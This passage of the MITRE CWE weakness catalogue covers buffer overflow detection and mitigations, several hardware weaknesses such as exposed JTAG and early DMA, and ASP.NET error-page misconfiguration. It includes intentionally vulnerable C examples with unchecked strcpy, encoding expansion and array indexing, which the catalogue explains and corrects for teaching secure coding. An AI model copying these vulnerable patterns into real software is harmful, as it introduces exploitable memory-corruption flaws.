warnings should be investigated first. For example, an analysis tool might report buffer overflows that originate from command line arguments in a program that is not expected to run with setuid or other special privileges. - - High - Detection techniques for buffer-related errors are more mature than for most other weakness types. - - - Automated Dynamic Analysis - This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software's operation may slow down, but it should not become unstable, crash, or generate incorrect results. - - - Automated Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Binary / Bytecode Quality Analysis - Bytecode Weakness Analysis - including disassembler + source code weakness analysis - Binary Weakness Analysis - including disassembler + source code weakness analysis - - - - - SOAR Partial - - - Manual Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies - - - - - SOAR Partial - - - Dynamic Analysis with Automated Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Web Application Scanner - Web Services Scanner - Database Scanners - - - - - SOAR Partial - - - Dynamic Analysis with Manual Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Fuzz Tester - Framework-based Fuzzer - - - - - SOAR Partial - - - Manual Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Focused Manual Spotcheck - Focused manual analysis of source - Manual Source Code Review (not inspections) - - - - - SOAR Partial - - - Automated Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Source code Weakness Analyzer - Context-configured Source Code Weakness Analyzer - - - Cost effective for partial coverage: - - - Source Code Quality Analyzer - - - - - High - - - Architecture or Design Review - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Formal Methods / Correct-By-Construction - - - Cost effective for partial coverage: - - - Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) - - - - - High - - - - - Requirements - Language Selection - - Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. - For example, many languages that perform their own memory management, such as Java and Perl, are not subject to buffer overflows. Other languages, such as Ada and C#, typically provide overflow protection, but the protection can be disabled by the programmer. - Be wary that a language's interface to native code may still be subject to overflows, even if the language itself is theoretically safe. - - - - Architecture and Design - Libraries or Frameworks - - Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. - Examples include the Safe C String Library (SafeStr) by Messier and Viega [REF-57], and the Strsafe.h library from Microsoft [REF-56]. These libraries provide safer versions of overflow-prone string-handling functions. - - This is not a complete solution, since many buffer overflows are not related to strings. - - - Build and Compilation - Compilation or Build Hardening - - Run or compile the software using features or extensions that automatically provide a protection mechanism that mitigates or eliminates buffer overflows. - For example, certain compilers and extensions provide automatic buffer overflow detection mechanisms that are built into the compiled code. Examples include the Microsoft Visual Studio /GS flag, Fedora/Red Hat FORTIFY_SOURCE GCC flag, StackGuard, and ProPolice. - - Defense in Depth - This is not necessarily a complete solution, since these mechanisms can only detect certain types of overflows. In addition, an attack could still cause a denial of service, since the typical response is to exit the application. - - - Implementation - - Consider adhering to the following rules when allocating and managing an application's memory: - - - Double check that the buffer is as large as specified. - When using functions that accept a number of bytes to copy, such as strncpy(), be aware that if the destination buffer size is equal to the source buffer size, it may not NULL-terminate the string. - Check buffer boundaries if accessing the buffer in a loop and make sure there is no danger of writing past the allocated space. - If necessary, truncate all input strings to a reasonable length before passing them to the copy and concatenation functions. - - - - - - Operation - Environment Hardening - - Run or compile the software using features or extensions that randomly arrange the positions of a program's executable and libraries in memory. Because this makes the addresses unpredictable, it can prevent an attacker from reliably jumping to exploitable code. - Examples include Address Space Layout Randomization (ASLR) [REF-58] [REF-60] and Position-Independent Executables (PIE) [REF-64]. - - Defense in Depth - This is not a complete solution. However, it forces the attacker to guess an unknown value that changes every program execution. In addition, an attack could still cause a denial of service, since the typical response is to exit the application. - - - Operation - Environment Hardening - Use a CPU and operating system that offers Data Execution Protection (NX) or its equivalent [REF-60] [REF-61]. - Defense in Depth - This is not a complete solution, since buffer overflows could be used to overwrite nearby variables to modify the software's state in dangerous ways. In addition, it cannot be used in cases in which self-modifying code is required. Finally, an attack could still cause a denial of service, since the typical response is to exit the application. - - - Implementation - Replace unbounded copy functions with analogous functions that support length arguments, such as strcpy with strncpy. Create these if they are not available. - Moderate - This approach is still susceptible to calculation errors, including issues such as off-by-one errors (CWE-193) and incorrectly calculating buffer lengths (CWE-131). - - - - - This example takes an IP address from a user, verifies that it is well formed and then looks up the hostname and copies it into a buffer. - - void host_lookup(char *user_supplied_addr){ - struct hostent *hp;in_addr_t *addr;char hostname[64];in_addr_t inet_addr(const char *cp); - - /*routine that ensures user_supplied_addr is in the right format for conversion */ - - validate_addr_form(user_supplied_addr);addr = inet_addr(user_supplied_addr);hp = gethostbyaddr( addr, sizeof(struct in_addr), AF_INET);strcpy(hostname, hp->h_name); - } - - This function allocates a buffer of 64 bytes to store the hostname, however there is no guarantee that the hostname will not be larger than 64 bytes. If an attacker specifies an address which resolves to a very large hostname, then the function may overwrite sensitive data or even relinquish control flow to the attacker. - Note that this example also contains an unchecked return value (CWE-252) that can lead to a NULL pointer dereference (CWE-476). - - - This example applies an encoding procedure to an input string and stores it into a buffer. - - char * copy_input(char *user_supplied_string){ - int i, dst_index;char *dst_buf = (char*)malloc(4*sizeof(char) * MAX_SIZE);if ( MAX_SIZE <= strlen(user_supplied_string) ){die("user string too long, die evil hacker!");}dst_index = 0;for ( i = 0; i < strlen(user_supplied_string); i++ ){ - if( '&' == user_supplied_string[i] ){dst_buf[dst_index++] = '&';dst_buf[dst_index++] = 'a';dst_buf[dst_index++] = 'm';dst_buf[dst_index++] = 'p';dst_buf[dst_index++] = ';';}else if ('<' == user_supplied_string[i] ){ - - - /* encode to &lt; */ - - - }else dst_buf[dst_index++] = user_supplied_string[i]; - }return dst_buf; - } - - The programmer attempts to encode the ampersand character in the user-controlled string, however the length of the string is validated before the encoding procedure is applied. Furthermore, the programmer assumes encoding expansion will only expand a given character by a factor of 4, while the encoding of the ampersand expands by 5. As a result, when the encoding procedure expands the string it is possible to overflow the destination buffer if the attacker provides a string of many ampersands. - - - The following example asks a user for an offset into an array to select an item. - - - int main (int argc, char **argv) {char *items[] = {"boat", "car", "truck", "train"};int index = GetUntrustedOffset();printf("You selected %s\n", items[index-1]);} - - The programmer allows the user to specify which element in the list to select, however an attacker can provide an out-of-bounds offset, resulting in a buffer over-read (CWE-126). - - - In the following code, the method retrieves a value from an array at a specific array index location that is given as an input parameter to the method - - int getValueFromArray(int *array, int len, int index) { - - int value; - - // check that the array index is less than the maximum - - - // length of the array - if (index < len) { - - - // get the value at the specified index of the array - value = array[index]; - } - // if array index is invalid then output error message - - - // and return value indicating error - else {printf("Value is: %d\n", array[index]);value = -1;} - return value; - } - - However, this method only verifies that the given array index is less than the maximum length of the array but does not check for the minimum value (CWE-839). This will allow a negative value to be accepted as the input array index, which will result in a out of bounds read (CWE-125) and may allow access to sensitive memory. The input array index should be checked to verify that is within the maximum and minimum range required for the array (CWE-129). In this example the if statement should be modified to include a minimum range check, as shown below. - - - ... - - // check that the array index is within the correct - - - // range of values for the array - if (index >= 0 && index < len) { - ... - - - - Windows provides the _mbs family of functions to perform various operations on multibyte strings. When these functions are passed a malformed multibyte string, such as a string containing a valid leading byte followed by a single null byte, they can read or write past the end of the string buffer causing a buffer overflow. The following functions all pose a risk of buffer overflow: _mbsinc _mbsdec _mbsncat _mbsncpy _mbsnextc _mbsnset _mbsrev _mbsset _mbsstr _mbstok _mbccpy _mbslen - - - - - CVE-2009-2550 - Classic stack-based buffer overflow in media player using a long entry in a playlist - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2550 - - - CVE-2009-2403 - Heap-based buffer overflow in media player using a long entry in a playlist - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2403 - - - CVE-2009-0689 - large precision value in a format string triggers overflow - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0689 - - - CVE-2009-0690 - negative offset value leads to out-of-bounds read - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0690 - - - CVE-2009-1532 - malformed inputs cause accesses of uninitialized or previously-deleted objects, leading to memory corruption - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1532 - - - CVE-2009-1528 - chain: lack of synchronization leads to memory corruption - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1528 - - - CVE-2021-29529 - Chain: machine-learning product can have a heap-based - buffer overflow (CWE-122) when some integer-oriented bounds are - calculated by using ceiling() and floor() on floating point values - (CWE-1339) - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29529 - - - CVE-2009-0558 - attacker-controlled array index leads to code execution - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0558 - - - CVE-2009-0269 - chain: -1 value from a function call was intended to indicate an error, but is used as an array index instead. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0269 - - - CVE-2009-0566 - chain: incorrect calculations lead to incorrect pointer dereference and memory corruption - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0566 - - - CVE-2009-1350 - product accepts crafted messages that lead to a dereference of an arbitrary pointer - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1350 - - - CVE-2009-0191 - chain: malformed input causes dereference of uninitialized memory - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0191 - - - CVE-2008-4113 - OS kernel trusts userland-supplied length value, allowing reading of sensitive information - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4113 - - - CVE-2005-1513 - Chain: integer overflow in securely-coded mail program leads to buffer overflow. In 2005, this was regarded as unrealistic to exploit, but in 2020, it was rediscovered to be easier to exploit due to evolutions of the technology. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1513 - - - CVE-2003-0542 - buffer overflow involving a regular expression with a large number of captures - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0542 - - - CVE-2017-1000121 - chain: unchecked message size metadata allows integer overflow (CWE-190) leading to buffer overflow (CWE-119). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000121 - - - - Memory - - - - A5 - Buffer Overflows - Exact - - - ARR00-C - Understand how arrays work - - - ARR30-C - Do not form or use out-of-bounds pointers or array subscripts - CWE More Abstract - - - ARR38-C - Guarantee that library functions do not form invalid pointers - CWE More Abstract - - - ENV01-C - Do not make assumptions about the size of an environment variable - - - EXP39-C - Do not access a variable through a pointer of an incompatible type - Imprecise - - - FIO37-C - Do not assume character data has been read - - - STR31-C - Guarantee that storage for strings has sufficient space for character data and the null terminator - CWE More Abstract - - - STR32-C - Do not pass a non-null-terminated character sequence to a library function that expects a string - CWE More Abstract - - - 7 - Buffer Overflow - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - It is possible in any programming languages without memory management support to attempt an operation outside of the bounds of a memory buffer, but the consequences will vary widely depending on the language, platform, and chip architecture. - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - Veracode - 2008-08-15 - Suggested OWASP Top Ten 2004 mapping - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Relationships - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-01-12 - updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Likelihood_of_Exploit, Name, Potential_Mitigations, References, Relationships - - - CWE Content Team - MITRE - 2009-03-10 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2009-07-27 - updated Observed_Examples - - - CWE Content Team - MITRE - 2009-10-29 - updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Relationships, Time_of_Introduction - - - CWE Content Team - MITRE - 2009-12-28 - updated Common_Consequences, Demonstrative_Examples, Detection_Factors, Observed_Examples - - - CWE Content Team - MITRE - 2010-02-16 - updated Alternate_Terms, Applicable_Platforms, Demonstrative_Examples, Detection_Factors, Potential_Mitigations, References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-06-21 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-09-27 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2010-12-13 - updated Name - - - CWE Content Team - MITRE - 2011-03-29 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, Potential_Mitigations, References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2013-02-21 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2014-02-18 - updated Potential_Mitigations, References - - - CWE Content Team - MITRE - 2014-07-30 - updated Detection_Factors, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-05-03 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Observed_Examples, References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2018-03-27 - updated References - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2019-09-19 - updated References, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships, Taxonomy_Mappings, Time_of_Introduction - - - CWE Content Team - MITRE - 2020-06-25 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Alternate_Terms, Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Alternate_Terms, Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Demonstrative_Examples, Observed_Examples, Potential_Mitigations, Relationships - - Buffer Errors - Failure to Constrain Operations within the Bounds of an Allocated Memory Buffer - Failure to Constrain Operations within the Bounds of a Memory Buffer - - - - The product enables a Direct Memory Access (DMA) capable device before the security configuration settings are established, which allows an attacker to extract data from or gain privileges on the product. - - DMA is included in a number of devices because it allows - data transfer between the computer and the connected device, using - direct hardware access to read or write directly to main memory - without any OS interaction. An attacker could exploit this to - access secrets. Several virtualization-based mitigations have been introduced to thwart DMA attacks. These are usually - configured/setup during boot time. However, certain IPs that are - powered up before boot is complete (known as early boot IPs) may - be DMA capable. Such IPs, if not trusted, could launch DMA - attacks and gain access to assets that should otherwise be - protected. - - - - - - - - - - - Architecture and Design - - - - - Access Control - Bypass Protection Mechanism - Modify Memory - High - DMA devices have direct write access to main memory and - due to time of attack will be able to bypass OS or Bootloader - access control. - - - - - Architecture and Design - Utilize an IOMMU to orchestrate IO access from - the start of the boot process. - - - - - - - - - - - - - - - - - Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi - Intel Corporation - 2019-10-15 - - - CWE Content Team - MITRE - 2020-08-20 - updated Related_Attack_Patterns - - - - - The chip does not implement or does not correctly perform access control to check whether users are authorized to access internal registers and test modes through the physical debug/test interface. - - A device's internal information may be accessed through a scan chain of interconnected internal registers, usually through a JTAG interface. The JTAG interface provides access to these registers in a serial fashion in the form of a scan chain for the purposes of debugging programs running on a device. Since almost all information contained within a device may be accessed over this interface, device manufacturers typically insert some form of authentication and authorization to prevent unintended use of this sensitive information. This mechanism is implemented in addition to on-chip protections that are already present. - If authorization, authentication, or some other form of access control is not implemented or not implemented correctly, a user may be able to bypass on-chip protection mechanisms through the debug interface. - - - - - - - Primary - - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Confidentiality - Read Application Data - High - - - Confidentiality - Read Memory - High - - - Authorization - Execute Unauthorized Code or Commands - High - - - Integrity - Modify Memory - High - - - Integrity - Modify Application Data - High - - - Access Control - Bypass Protection Mechanism - High - - - - - Dynamic Analysis with Manual Results Interpretation - Authentication and authorization of debug and test interfaces should be part of the architecture and design review process. Withholding of private register documentation from the debug and test interface public specification ("Security by obscurity") should not be considered as sufficient security. - - - Dynamic Analysis with Manual Results Interpretation - Dynamic tests should be done in the pre-silicon and post-silicon stages to verify that the debug and test interfaces are not open by default. - - - Fuzzing - Tests that fuzz Debug and Test Interfaces should ensure that no access without appropriate authentication and authorization is possible. - Moderate - - - - - Architecture and Design - Separation of Privilege - - If feasible, the manufacturer should disable the JTAG interface or implement authentication and authorization for the JTAG interface. If authentication logic is added, it should be resistant to timing attacks. Security-sensitive data stored in registers, such as keys, etc. should be cleared when entering debug mode. - - High - - - - - A home, WiFi-router device implements a login prompt which prevents an unauthorized user from issuing any commands on the device until appropriate credentials are provided. The credentials are protected on the device and are checked for strength against attack. - - If the JTAG interface on this device is not hidden by the manufacturer, the interface may be identified using tools such as JTAGulator. If it is hidden but not disabled, it can be exposed by physically wiring to the board. - By issuing a halt command before the OS starts, the unauthorized user pauses the watchdog timer and prevents the router from restarting (once the watchdog timer would have expired). Having paused the router, an unauthorized user is able to execute code and inspect and modify data in the device, even extracting all of the router's firmware. This allows the user to examine the router and potentially exploit it. - - JTAG is useful to chip and device manufacturers during design, testing, and production and is included in nearly every product. Without proper authentication and authorization, the interface may allow tampering with a product. - In order to prevent exposing the debugging interface, manufacturers might try to obfuscate the JTAG interface or blow device internal fuses to disable the JTAG interface. Adding authentication and authorization to this interface makes use by unauthorized individuals much more difficult. - - - - - CVE-2019-18827 - chain: JTAG interface is not disabled (CWE-1191) during ROM code execution, introducing a race condition (CWE-362) to extract encryption keys - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18827 - - - - - - - - - - - - - - - CWE-1191 and CWE-1244 both involve physical debug access, - but the weaknesses are different. CWE-1191 is effectively - about missing authorization for a debug interface, - i.e. JTAG. CWE-1244 is about providing internal assets with - the wrong debug access level, exposing the asset to - untrusted debug agents. - - - - Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi - Intel Corporation - 2019-10-15 - - - CWE Content Team - MITRE - 2020-06-25 - updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Name, References, Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Applicable_Platforms, Demonstrative_Examples, Description, Name, Potential_Mitigations, Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Maintenance_Notes - - - Parbati K. Manna - Intel Corporation - 2021-10-18 - provided detection methods - - - Narasimha Kumar V Mangipudi - Lattice Semiconductor - 2021-10-20 - reviewed content changes - - - Hareesh Khattri - Intel Corporation - 2021-10-22 - clarified differences between CWE-1191 and CWE-1244 - - Exposed Chip Debug Interface With Insufficient Access Control - Exposed Chip Debug and or Test Interface With Insufficient Access Control - - - - The System-on-Chip (SoC) does not have unique, immutable identifiers for each of its components. - - A System-on-Chip (SoC) comprises several components (IP) with varied - trust requirements. It is required that each IP is identified - uniquely and should distinguish itself from other entities in - the SoC without any ambiguity. The unique secured identity is - required for various purposes. Most of the time the identity is used - to route a transaction or perform certain actions, including - resetting, retrieving a sensitive information, and acting upon or on - behalf of something else. - There are several variants of this weakness: - - A "missing" identifier is when the SoC does not define - any mechanism to uniquely identify the IP. - An "insufficient" identifier might provide - some defenses - for example, against the most common - attacks - but it does not protect against everything - that is intended. - A "misconfigured" mechanism occurs when a mechanism - is available but not implemented correctly. - An "ignored" identifier occurs when the SoC/IP has not applied - any policies or does not act upon the identifier securely. - - - - - - - - - - - - Architecture and Design - - - Implementation - - - Operation - - - - - Access Control - Bypass Protection Mechanism - High - - - - - Architecture and Design - Separation of Privilege - - - Every identity generated in the SoC should be unique and - immutable in hardware. The actions that an IP is trusted or - not trusted should be clearly defined, implemented, - configured, and tested. If the definition is implemented via a - policy, then the policy should be immutable or protected with - clear authentication and authorization. - - - - - - - - - - Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi - Intel Corporation - 2019-10-15 - - - CWE Content Team - MITRE - 2020-08-20 - updated Description - - - CWE Content Team - MITRE - 2020-12-10 - updated Related_Attack_Patterns - - - - - The product enables components that contain untrusted firmware before memory and fabric access controls have been enabled. - - - After initial reset, System-on-Chip (SoC) fabric access controls and other - security features need to be programmed by trusted firmware as part - of the boot sequence. If untrusted IPs or peripheral microcontrollers - are enabled first, then the untrusted component can master - transactions on the hardware bus and target memory or other assets to - compromise the SoC boot firmware. - - - - - - Access Control - Bypass Protection Mechanism - High - An untrusted component can master transactions on the HW bus and target memory or other assets to compromise the SoC boot firmware. - - - - - Architecture and Design - - The boot sequence should enable fabric access controls and memory protections before enabling third-party hardware IPs and peripheral microcontrollers that use untrusted firmware. - - - - - - - - - - - - - - Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi - Intel Corporation - 2019-10-15 - - - CWE Content Team - MITRE - 2020-08-20 - updated References, Related_Attack_Patterns - - - - - An ASP .NET application must enable custom error pages in order to prevent attackers from mining information from the framework's built-in responses. - - - - - - - - The mode attribute of the <customErrors> tag defines whether custom or default error pages are used. - - - - Implementation - - - Operation - - - - - Confidentiality - Read Application Data - Default error pages gives detailed information about the error that occurred, and should not be used in production environments. Attackers can leverage the additional information provided by a default error page to mount attacks targeted on the framework, database, or other resources used by the application. - - - - - System Configuration - Handle exceptions appropriately in source code. ASP .NET applications should be configured to use custom error pages instead of the framework default page. - - - Architecture and Design - Do not attempt to process an error or attempt to mask it. - - - Implementation - Verify return values are correct and do not supply sensitive information about the system. - - - - - The mode attribute of the <customErrors> tag in the Web.config file defines whether custom or default error pages are used. - In the following insecure ASP.NET application setting, custom error message mode is turned off. An ASP.NET error message with detailed stack trace and platform versions will be returned. - - <customErrors mode="Off" /> - - A more secure setting is to set the custom error message mode for remote users only. No defaultRedirect error page is specified. The local user on the web server will see a detailed stack trace. For remote users, an ASP.NET error message with the server customError configuration setting and the platform version will be returned. - - <customErrors mode="RemoteOnly" /> - - Another secure option is to set the mode attribute of the <customErrors> tag to use a custom page as follows: - - <customErrors mode="On" defaultRedirect="YourErrorPage.htm" /> - - - - - - ASP.NET Misconfiguration: Missing Custom Error Handling - - - - - - - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated References, Demonstrative_Example, Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, References, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Relationships - - - CWE Content Team - MITRE - 2008-11-24 - updated Common_Consequences, Other_Notes, Potential_Mitigations - - - CWE Content Team - MITRE - 2009-03-10 - updated Name, Relationships - - - CWE Content Team - MITRE - 2009-07-27 - updated Background_Details, Common_Consequences, Other_Notes - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2013-02-21 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Demonstrative_Examples, Potential_Mitigations, References, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - ASP.NET Misconfiguration: Missing Custom Error Handling - - - - The program copies an input buffer to an output buffer without verifying that the size of the input buffer is less than the size of the output buffer, leading to a buffer overflow. - A buffer overflow condition exists when a program attempts to put more data in a buffer than it can hold, or when a program attempts to put data in a memory area outside of the boundaries of a buffer. The simplest type of error, and the most common cause of buffer overflows, is the "classic" case in which the program copies the buffer without restricting how much is copied. Other variants exist, but the existence of a classic overflow strongly suggests that the programmer is not considering even the most basic of security protections. - - - - - - - - - - - Resultant - - - Primary - - - - - - - - - - Classic Buffer Overflow - This term was frequently used by vulnerability researchers during approximately 1995 to 2005 to differentiate buffer copies without length checks (which had been known about for decades) from other emerging weaknesses that still involved invalid accesses of buffers, as vulnerability researchers began to develop advanced exploitation techniques. - - - Unbounded Transfer - - - - - Implementation - - - High - - - Integrity - Confidentiality - Availability - Modify Memory - Execute Unauthorized Code or Commands - Buffer overflows often can be used to execute arbitrary code, which is usually outside the scope of a program's implicit security policy. This can often be used to subvert any other security service. - - - Availability - Modify Memory - DoS: Crash, Exit, or Restart - DoS: Resource Consumption (CPU) - Buffer overflows generally lead to crashes. Other attacks leading to lack of availability are possible, including putting the program into an infinite loop. - - - - - Automated Static Analysis - - This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives. - Automated static analysis generally does not account for environmental considerations when reporting out-of-bounds memory operations. This can make it difficult for users to determine which warnings should be investigated first. For example, an analysis tool might report buffer overflows that originate from command line arguments in a program that is not expected to run with setuid or other special privileges. - - High - Detection techniques for buffer-related errors are more mature than for most other weakness types. - - - Automated Dynamic Analysis - This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software's operation may slow down, but it should not become unstable, crash, or generate incorrect results. - - - Manual Analysis - Manual analysis can be useful for finding this weakness, but it might not achieve desired code coverage within limited time constraints. This becomes difficult for weaknesses that must be considered for all inputs, since the attack surface can be too large. - - - Automated Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Bytecode Weakness Analysis - including disassembler + source code weakness analysis - Binary Weakness Analysis - including disassembler + source code weakness analysis - - - - - High - - - Manual Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies - - - - - SOAR Partial - - - Dynamic Analysis with Automated Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Web Application Scanner - Web Services Scanner - Database Scanners - - - - - SOAR Partial - - - Dynamic Analysis with Manual Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Fuzz Tester - Framework-based Fuzzer - - - - - SOAR Partial - - - Manual Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Focused Manual Spotcheck - Focused manual analysis of source - Manual Source Code Review (not inspections) - - - - - SOAR Partial - - - Automated Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Source code Weakness Analyzer - Context-configured Source Code Weakness Analyzer - - - - - High - - - Architecture or Design Review - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Formal Methods / Correct-By-Construction - - - Cost effective for partial coverage: - - - Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) - - - - - High - - - - - Requirements - Language Selection - - Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. - For example, many languages that perform their own memory management, such as Java and Perl, are not subject to buffer overflows. Other languages, such as Ada and C#, typically provide overflow protection, but the protection can be disabled by the programmer. - Be wary that a language's interface to native code may still be subject to overflows, even if the language itself is theoretically safe. - - - - Architecture and Design - Libraries or Frameworks - - Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. - Examples include the Safe C String Library (SafeStr) by Messier and Viega [REF-57], and the Strsafe.h library from Microsoft [REF-56]. These libraries provide safer versions of overflow-prone string-handling functions. - - This is not a complete solution, since many buffer overflows are not related to strings. - - - Build and Compilation - Compilation or Build Hardening - - Run or compile the software using features or extensions that automatically provide a protection mechanism that mitigates or eliminates buffer overflows. - For example, certain compilers and extensions provide automatic buffer overflow detection mechanisms that are built into the compiled code. Examples include the Microsoft Visual Studio /GS flag, Fedora/Red Hat FORTIFY_SOURCE GCC flag, StackGuard, and ProPolice. - - Defense in Depth - This is not necessarily a complete solution, since these mechanisms can only detect certain types of overflows. In addition, an attack could still cause a denial of service, since the typical response is to exit the application. - - - Implementation - - Consider adhering to the following rules when allocating and managing an application's memory: - - - Double check that your buffer is as large as you specify. - When using functions that accept a number of bytes to copy, such as strncpy(), be aware that if the destination buffer size is equal to the source buffer size, it may not NULL-terminate the string. - Check buffer boundaries if accessing the buffer in a loop and make sure there is no danger of writing past the allocated space. - If necessary, truncate all input strings to a reasonable length before passing them to the copy and concatenation functions. - - - - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - - - - Architecture and Design - For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server. - - - Operation - Environment Hardening - - Run or compile the software using features or extensions that randomly arrange the positions of a program's executable and libraries in memory. Because this makes the addresses unpredictable, it can prevent 